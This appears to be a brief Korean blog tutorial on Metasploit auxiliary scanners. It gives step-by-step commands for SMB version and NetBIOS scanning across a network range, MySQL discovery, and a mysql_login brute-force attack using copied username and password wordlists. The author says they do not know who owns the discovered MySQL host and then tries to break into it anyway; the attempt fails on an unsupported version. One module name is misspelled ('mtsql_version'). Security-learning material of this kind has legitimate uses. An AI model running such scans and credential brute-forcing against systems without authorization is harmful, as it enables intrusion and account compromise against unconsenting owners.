msf 이용하기2

포트스캐닝에 관한 이야기를 계속하겠습니다.

앞에서 말한거와 같이 포트스캐닝에는 nmap 같이 유명한 도구가 있습니다.

우리는 msf 보조기능을 이용해보겠습니다.

1. use auxiliary/scanner/smb/smb_version

2. set rhosts 192.168.32.0/24

192.168.32.0/24를 이용해 대역을 스캔하는 것이다.

3. set threads 256

이러게 함으로 run을 할 수 있다.

여기서 조금더 자세히 알고싶고 아이피를 안다면 

1. use auxiliary/scanner/netbios/nbname

2. set rhosts IP

3. set threads 256

이렇게 하면 run을 할수 있다.

IP대역을 이용하여 mysql 탐색하는 방법

1. use auxiliary/scanner/mysql/mtsql_version

2. set rhosts IP

이렇게 아이피 대역을 잡아주고 

3. set rport 3306

sql 포트를 지정해준다.

4. set threads 256

이렇게 하면 준비 끝!!!

이렇게 나온다. 누구껀지 모른다...

이를 공격해보기 무차별 공격을 해보자

1. use auxiliary/scanner/mysql/mysql_login

2. set rhosts IP

3. set rport 3306

4. set user_file /tmp/users.txt

이는 무차별 공격 하기위해 유저아이디의 사전파일을 등록해주는 것이다.

기본적으로는 (cp /usr/share/w3af/w3af/core/controllers/bruteforce/users.txt /tmp/ <=명령어이용하여 tmp로 이동시켜야함) = passwords.txt도 동일

5. set pass_file /tmp/passwords.txt

6. set stop_on_success true

결과값이 true가 뜨면 멈추라는 명령어이다.

7. set threads 256

준비끝인데...

왜안될까?

이유는 지원되지 않는 버전 대상이래요 ,,,